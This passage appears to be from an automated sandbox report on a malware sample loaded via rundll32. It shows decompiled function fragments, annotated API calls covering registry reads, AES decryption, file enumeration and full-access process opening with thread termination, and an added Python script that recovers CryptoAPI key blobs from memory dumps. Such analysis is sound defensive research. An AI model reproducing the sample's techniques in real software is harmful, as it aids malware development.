                                              • Part of subcall function 05805DA0: Thread32First.KERNEL32(?,0000001C), ref: 05805E09
                                              • Part of subcall function 05805DA0: CloseHandle.KERNEL32(?), ref: 05805E51
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                            • String ID:
                                            • API String ID: 2627809124-0
                                            • Opcode ID: aa69dd995e65039bc8da9ef242d22bc1b6e29c872b9728366ebeaa4ddb27a325
                                            • Instruction ID: 2221d9fd1e3f005e7c58d1b4791bc4a4cfba3cf82b39ff5bd25f9f53779448ad
                                            • Opcode Fuzzy Hash: aa69dd995e65039bc8da9ef242d22bc1b6e29c872b9728366ebeaa4ddb27a325
                                            • Instruction Fuzzy Hash: 9E018471610214BF9B65D7AADC89CAF7FACEF042447004055FC01E3180DA31BE408B75
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,058134FE,05819CDB,00000000,00000000), ref: 058156F4
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                              • Part of subcall function 05803622: lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                              • Part of subcall function 05803622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                              • Part of subcall function 05803622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                              • Part of subcall function 05803622: GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                              • Part of subcall function 05803622: HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                            • String ID:
                                            • API String ID: 730886825-0
                                            • Opcode ID: 19cdc7d09fa3adb16ca2b2dc2ef675cdb77403396045b51f9a57f9320d51acb1
                                            • Instruction ID: 38b26cced910fa3bc211093ed3f673e0a56e43779ac6aa90827d871baafcbe54
                                            • Opcode Fuzzy Hash: 19cdc7d09fa3adb16ca2b2dc2ef675cdb77403396045b51f9a57f9320d51acb1
                                            • Instruction Fuzzy Hash: EB014831620204BBDB21E79ADD0AF9A7FACEB45610F004455FE05E3190DA70BE408BAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                            				void* _t21;
                                            				void* _t22;
                                            				signed int _t24;
                                            				intOrPtr* _t26;
                                            				void* _t27;
                                            
                                            				_t26 = __edi;
                                            				if(_a4 == 0) {
                                            					L2:
                                             					_t27 = E049F4E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12); // 0x80000002 is HKEY_LOCAL_MACHINE; returns a buffer in _a4 and its byte size in _a12 (consistent with a registry string read)
                                            					if(_t27 == 0) {
                                             						_t24 = _a12 >> 1; // byte count to WCHAR count
                                             						if(_t24 == 0) {
                                             							_t27 = 2; // empty value: release the buffer and return 2 (the value of ERROR_FILE_NOT_FOUND)
                                             							HeapFree( *0x49fa2d8, 0, _a4);
                                            						} else {
                                            							_t21 = _a4;
                                             							 *((short*)(_t21 + _t24 * 2 - 2)) = 0; // force a terminating NUL on the last WCHAR; registry string values are not guaranteed to carry one
                                            							 *_t26 = _t21;
                                            						}
                                            					}
                                            					L6:
                                            					return _t27;
                                            				}
                                            				_t22 = E049F6D05(_a4, _a8, _a12, __edi); // executed
                                            				_t27 = _t22;
                                            				if(_t27 == 0) {
                                            					goto L6;
                                            				}
                                            				goto L2;
                                             			}

                                             Instruction addresses: 0x049f427e to 0x049f42eb

                                            APIs
                                              • Part of subcall function 049F6D05: SysFreeString.OLEAUT32(00000000), ref: 049F6D68
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,049F681F,?,004F0053,04F793D8,00000000,?), ref: 049F42E1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Free$HeapString
                                            • String ID:
                                            • API String ID: 3806048269-0
                                            • Opcode ID: fe1215078044b0066c361e4a42ab073f1170ad7ec6d7666de6a6d8ee9321168d
                                            • Instruction ID: fb7a0a4718ab911bddd2aa1d47d96f824f698cd34113d1992e095592a02113e5
                                            • Opcode Fuzzy Hash: fe1215078044b0066c361e4a42ab073f1170ad7ec6d7666de6a6d8ee9321168d
                                            • Instruction Fuzzy Hash: 6001FB36500619BBDB229F94CC05FEB7B69EF54750F058038FF099A120D731E960EB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E049F723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                            				void* _t13;
                                            				void* _t21;
                                            
                                            				_t11 =  &_a4;
                                            				_t21 = 0;
                                             				__imp__( &_a8); // lstrlen (ref 049F724C in the APIs list for this function)
                                             				_t13 = E049F3072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed; CryptoAPI decrypt routine (CryptAcquireContextW/CryptImportKey/CryptSetKeyParam, see APIs below)
                                             				if(_t13 == 0) {
                                             					_t21 = E049F4DF6(_a8 + _a8); // heap buffer of twice the length (RtlAllocateHeap wrapper, see APIs below)
                                             					if(_t21 != 0) {
                                             						E049F1908(_a4, _t21, _t23);
                                             					}
                                             					E049F4C73(_a4); // release the input buffer (consistent with a heap-free wrapper; also used on the cleanup path of E049F17E5)
                                            				}
                                            				return _t21;
                                             			}

                                             Instruction addresses: 0x049f7243 to 0x049f728e

                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,00000000,?,049F379D,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F724C
                                              • Part of subcall function 049F3072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,049F58B7), ref: 049F30AA (dwProvType 0x18 = PROV_RSA_AES, dwFlags 0xF0000000 = CRYPT_VERIFYCONTEXT)
                                              • Part of subcall function 049F3072: memcpy.NTDLL(?,049F58B7,00000010,?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90), ref: 049F30C3 (16-byte copy, the key length)
                                              • Part of subcall function 049F3072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 049F30EC (dwDataLen 0x1C is consistent with a PLAINTEXTKEYBLOB: 12-byte header plus a 16-byte key)
                                              • Part of subcall function 049F3072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 049F3104 (dwParam 1 = KP_IV)
                                              • Part of subcall function 049F3072: memcpy.NTDLL(00000000,049F6D90,049F58B7,0000011F), ref: 049F3156
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                            • String ID:
                                            • API String ID: 894908221-0
                                            • Opcode ID: 58866349eb7167dbedb209c30f9d74912de520efb8af8c647eb671888d2a99a9
                                            • Instruction ID: 15dc2c8a321421ab6df9d0651282f89bc9711b415580adad42e3ed39c00e0d29
                                            • Opcode Fuzzy Hash: 58866349eb7167dbedb209c30f9d74912de520efb8af8c647eb671888d2a99a9
                                            • Instruction Fuzzy Hash: 12F05E76100108BBDF11AE95DC00CDB3FADEFC5264B008032FE19DA110EA32EA659BE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%
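
Added example (Python), not code from the sample or from Joe Sandbox: the subcall APIs of E049F723B above show CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flags 0xF0000000 (CRYPT_VERIFYCONTEXT), CryptImportKey with a 0x1C-byte blob, and CryptSetKeyParam with parameter 1 (KP_IV). A 0x1C-byte PLAINTEXTKEYBLOB is a 12-byte header (BLOBHEADER plus dwKeySize) followed by a 16-byte key, which together with a separately set IV on that provider is consistent with AES-128 in CBC mode. The code below builds and parses that blob layout and scans a buffer for embedded blobs, which is how one would pull the key out of a process dump such as the ones listed under Memory Dump Source. The key bytes and the surrounding buffer are constructed; the ALG_ID the sample actually uses is not shown in the report and is an assumption here.

```python
import struct

# CryptoAPI constants (wincrypt.h)
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
CALG_AES_128 = 0x660E
CALG_AES_192 = 0x660F
CALG_AES_256 = 0x6610
CALG_RC4 = 0x6801
PROV_RSA_AES = 0x18               # dwProvType seen in the CryptAcquireContextW call
CRYPT_VERIFYCONTEXT = 0xF0000000  # dwFlags seen in the same call
KP_IV = 1                         # dwParam seen in the CryptSetKeyParam call

ALG_NAMES = {CALG_AES_128: "CALG_AES_128", CALG_AES_192: "CALG_AES_192",
             CALG_AES_256: "CALG_AES_256", CALG_RC4: "CALG_RC4"}

# BLOBHEADER {bType, bVersion, reserved, aiKeyAlg} followed by DWORD dwKeySize, little-endian
BLOB_HDR = struct.Struct("<BBHII")   # 12 bytes


def build_plaintext_key_blob(key: bytes, alg_id: int) -> bytes:
    """Lay out a PLAINTEXTKEYBLOB exactly as CryptImportKey expects it."""
    return BLOB_HDR.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Validate the header fields and return the ALG_ID, its name and the raw key."""
    if len(blob) < BLOB_HDR.size:
        raise ValueError("blob shorter than BLOBHEADER + dwKeySize")
    btype, bver, reserved, alg_id, key_size = BLOB_HDR.unpack_from(blob)
    if btype != PLAINTEXTKEYBLOB:
        raise ValueError(f"bType 0x{btype:02x} is not PLAINTEXTKEYBLOB")
    if bver != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("unexpected bVersion/reserved in BLOBHEADER")
    if len(blob) != BLOB_HDR.size + key_size:
        raise ValueError(f"dwKeySize {key_size} does not match blob length {len(blob)}")
    return {"alg_id": alg_id,
            "alg": ALG_NAMES.get(alg_id, f"CALG_0x{alg_id:04x}"),
            "key": blob[BLOB_HDR.size:]}


def scan_for_key_blobs(buf: bytes,
                       alg_ids=(CALG_AES_128, CALG_AES_192, CALG_AES_256, CALG_RC4)) -> list:
    """Find candidate PLAINTEXTKEYBLOBs in a memory dump by their fixed 8-byte header.

    For each ALG_ID the header is 08 02 00 00 <alg LE32>; the DWORD after it is the
    key length, which has to be plausible and fit inside the buffer."""
    hits = []
    for alg_id in alg_ids:
        pattern = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id)
        pos = buf.find(pattern)
        while pos != -1:
            end = pos + BLOB_HDR.size
            if end <= len(buf):
                key_size = struct.unpack_from("<I", buf, pos + 8)[0]
                if 0 < key_size <= 64 and end + key_size <= len(buf):
                    try:
                        hits.append((pos, parse_plaintext_key_blob(buf[pos:end + key_size])))
                    except ValueError:
                        pass
            pos = buf.find(pattern, pos + 1)
    return hits


# Constructed demo data, not from the sample: a 16-byte key blob embedded in junk.
DEMO_KEY = bytes(range(0x10, 0x20))
DEMO_BLOB = build_plaintext_key_blob(DEMO_KEY, CALG_AES_128)   # 0x1C bytes, like the sample's
DEMO_DUMP = b"\x90" * 37 + DEMO_BLOB + b"\x00" * 11


def demo() -> dict:
    """Return the blob length and the blobs recovered from the constructed dump."""
    return {"blob_len": len(DEMO_BLOB), "hits": scan_for_key_blobs(DEMO_DUMP)}
```

Each hit is an (offset, parsed) pair. On a real dump the recovered key together with the IV buffer passed to CryptSetKeyParam(KP_IV) is what an AES-CBC decryptor needs to replay the sample's decryption outside the sandbox.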

                                            C-Code - Quality: 100%
                                            			E049F3B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                            				void* _t17;
                                            
                                            				if(_a4 == 0) {
                                            					L2:
                                            					// _t14 is an undeclared decompiler temporary; the size argument is derived from lstrlenW(_a20)
                                            					return E049F3BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                            				}
                                            				_t17 = E049F78E7(_a4, _a8, _a12, _a16, _a20); // executed; SysAllocString/SysFreeString inside (see subcall APIs)
                                            				if(_t17 != 0) {
                                            					goto L2;
                                            				}
                                            				return _t17;
                                            			}

                                            Statement addresses: 0x049f3b7e, 0x049f3b98, 0x00000000, 0x049f3bb4, 0x049f3b8f, 0x049f3b96, 0x00000000, 0x00000000, 0x049f3bbb

                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,049F6FE9,3D049F90,80000002,049F2A82,049F744C,74666F53,4D4C4B48,049F744C,?,3D049F90,80000002,049F2A82,?), ref: 049F3B9B (the stack arguments include 80000002 = HKEY_LOCAL_MACHINE and the DWORDs 74666F53 / 4D4C4B48, which read "Soft" / "HKLM" as little-endian ASCII)
                                              • Part of subcall function 049F78E7: SysAllocString.OLEAUT32(049F744C), ref: 049F7900
                                              • Part of subcall function 049F78E7: SysFreeString.OLEAUT32(00000000), ref: 049F7941
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFreelstrlen
                                            • String ID:
                                            • API String ID: 3808004451-0
                                            • Opcode ID: 48c984b8630a6cf73e33143e78cff7fba3e968971d79d9c2dcef35223227cc02
                                            • Instruction ID: 95aedec799c1774119b24dc536dc0cd2a1c43cb58ef77f072138ec10cd1e0dc1
                                            • Opcode Fuzzy Hash: 48c984b8630a6cf73e33143e78cff7fba3e968971d79d9c2dcef35223227cc02
                                            • Instruction Fuzzy Hash: AAF0793201020ABFEF129F90EC05EAA3F6AEB18355F048025FE1454160DB36E9B1EBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F6D7F(void* __edi, void* _a4) {
                                            				int _t7;
                                            				int _t12;
                                            
                                            				_t7 = E049F55D3(__edi, _a4,  &_a4); // executed; writes a buffer pointer back into _a4 and returns its length (memcpy/memset inside, see subcall APIs)
                                            				_t12 = _t7;
                                            				if(_t12 != 0) {
                                            					memcpy(__edi, _a4, _t12); // copy _t12 bytes into the caller's buffer
                                            					 *((char*)(__edi + _t12)) = 0; // NUL-terminate
                                            					E049F4C73(_a4); // release the temporary (RtlFreeHeap, see subcall APIs)
                                            				}
                                            				return _t12;
                                            			}

                                            Statement addresses: 0x049f6d8b, 0x049f6d90, 0x049f6d94, 0x049f6d9b, 0x049f6da6, 0x049f6daa, 0x049f6daa, 0x049f6db3

                                            APIs
                                              • Part of subcall function 049F55D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,049F6D90,?,049F58B7,049F58B7,?), ref: 049F5609
                                              • Part of subcall function 049F55D3: memset.NTDLL ref: 049F567F
                                              • Part of subcall function 049F55D3: memset.NTDLL ref: 049F5693
                                            • memcpy.NTDLL(?,049F58B7,00000000,?,049F58B7,049F58B7,?,?,049F58B7,?), ref: 049F6D9B
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpymemset$FreeHeap
                                            • String ID:
                                            • API String ID: 3053036209-0
                                            • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                            • Instruction ID: 446d72f450f48d8958803267051f08f567c28b73218423095540a07c1b15ddb0
                                            • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                            • Instruction Fuzzy Hash: F0E08C338082287BDB122A94DC00EEBBF5D9F956A0F054030FF088A215E621EA2093E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0581CC67
                                              • Part of subcall function 05816278: RegOpenKeyExA.KERNEL32(0581CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0581CC7F,80000001,?,05816085), ref: 058162BF (0x20119 = KEY_READ | KEY_WOW64_64KEY; 80000001 = HKEY_CURRENT_USER)
                                              • Part of subcall function 05816278: RegOpenKeyExA.ADVAPI32(0581CC7F,0581CC7F,00000000,00020019,80000001,?,0581CC7F,80000001,?,05816085), ref: 058162D5 (0x20019 = KEY_READ; 80000001 = HKEY_CURRENT_USER)
                                              • Part of subcall function 05816278: RegCloseKey.KERNEL32(80000001,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581631E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Open$Closememset
                                            • String ID:
                                            • API String ID: 1685373161-0
                                            • Opcode ID: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                            • Instruction ID: 937fd355214b7d3860fdb6f724c559d2699d2013da036419866882e86f8c7ab7
                                            • Opcode Fuzzy Hash: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                            • Instruction Fuzzy Hash: CBE0EC30240208B7DB00AA59C845FA9776EAB14650F00C025BE489E641EAB1AE60879A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0,?,00000318), ref: 05814878 (dwSize 0 with dwFreeType 0x8000 = MEM_RELEASE, i.e. the whole region is released)
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: e6f6f1f1697a5de673ef498ec4305b67ae4eb10c16e4d207958b42f260aa7996
                                            • Instruction ID: 44ebc01fc791b33e86af7275326eb669c66619ca15502b307f3fcb57e192363d
                                            • Opcode Fuzzy Hash: e6f6f1f1697a5de673ef498ec4305b67ae4eb10c16e4d207958b42f260aa7996
                                            • Instruction Fuzzy Hash: FCD0E231E00229DBCF219BA8D84A99EFB71BB08721B608224E861A71A0CA2059558B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 0581294B: ExpandEnvironmentStringsW.KERNEL32(0580AE31,00000000,00000000,00000001,00000000,00000000,?,0580AE31,00000000,?,?,00000000), ref: 05812962
                                              • Part of subcall function 0581294B: ExpandEnvironmentStringsW.KERNEL32(0580AE31,00000000,00000000,00000000), ref: 0581297C
                                            • lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                            • lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                            • memset.NTDLL ref: 05805AB4
                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                            • lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                            • lstrlenW.KERNEL32(?), ref: 05805B0F
                                            • memset.NTDLL ref: 05805B32
                                            • wcscpy.NTDLL ref: 05805B44
                                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                            • FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                            • FindClose.KERNEL32(?), ref: 05805BFC
                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                            • lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • FindNextFileW.KERNEL32(?,00000000), ref: 05805CA8
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 05805CBA
                                            • FindClose.KERNEL32(?), ref: 05805CD5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                            • String ID:
                                            • API String ID: 2962561936-0
                                            • Opcode ID: 7536a4fd30be4094e8e14cb0c630411dc55fd3f6328ebf59bba6fa45ce766c11
                                            • Instruction ID: 8e3d13de2ee83f7c47822fdbc3977eed3035ed4afdaaa9532ddddddb40b8ff75
                                            • Opcode Fuzzy Hash: 7536a4fd30be4094e8e14cb0c630411dc55fd3f6328ebf59bba6fa45ce766c11
                                            • Instruction Fuzzy Hash: E6817F71608305AFD7A0AF25DC88A1BBBE8FF88314F045819FD96D61A1DB74EC448F62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05815863 (dwDesiredAccess 0x1F0FFF = PROCESS_ALL_ACCESS)
                                            • GetLastError.KERNEL32(?,?,0580335A,?,00000000,?), ref: 05815871
                                            • NtSetInformationProcess.NTDLL ref: 058158CB
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0581590A
                                            • GetProcAddress.KERNEL32(?), ref: 0581592B
                                            • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05815982
                                            • CloseHandle.KERNEL32(?), ref: 05815998
                                            • CloseHandle.KERNEL32(?), ref: 058159BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                            • String ID: v
                                            • API String ID: 3529370251-1801730948
                                            • Opcode ID: 8245a03e5d9233ecb8d668e8f0d82a9f5128e17337e1ea30dc79c245a7e3ce9e
                                            • Instruction ID: f430cb7faf1208b23a79a00bf15e2a49cafde6e9b2793959f28e8d0cdbdce49d
                                            • Opcode Fuzzy Hash: 8245a03e5d9233ecb8d668e8f0d82a9f5128e17337e1ea30dc79c245a7e3ce9e
                                            • Instruction Fuzzy Hash: BA418B71108345AFDB20EF25D849A2BBFE9FBC8318F004929FD96D6160DB7099488F67
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801E88
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801EBA
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801EEC
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F1E
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F50
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F82
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801FB4
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801FE6
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05802018
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 058021AB
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?), ref: 0580224F
                                              • Part of subcall function 0581A2FF: RtlAllocateHeap.NTDLL ref: 0581A340
                                              • Part of subcall function 0581A2FF: memset.NTDLL ref: 0581A354
                                              • Part of subcall function 0581A2FF: GetCurrentThreadId.KERNEL32 ref: 0581A3E1
                                              • Part of subcall function 0581A2FF: GetCurrentThread.KERNEL32 ref: 0581A3F4
                                              • Part of subcall function 0580CDBF: RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580CDC8
                                              • Part of subcall function 0580CDBF: HeapFree.KERNEL32(00000000,?), ref: 0580CDFA
                                              • Part of subcall function 0580CDBF: RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580CE18
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 058021F7
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3296958911-0
                                            • Opcode ID: cb0e39f678f8567584d371bfbe47e2b57e6e0d16d73476a93db6a3c70dc166cb
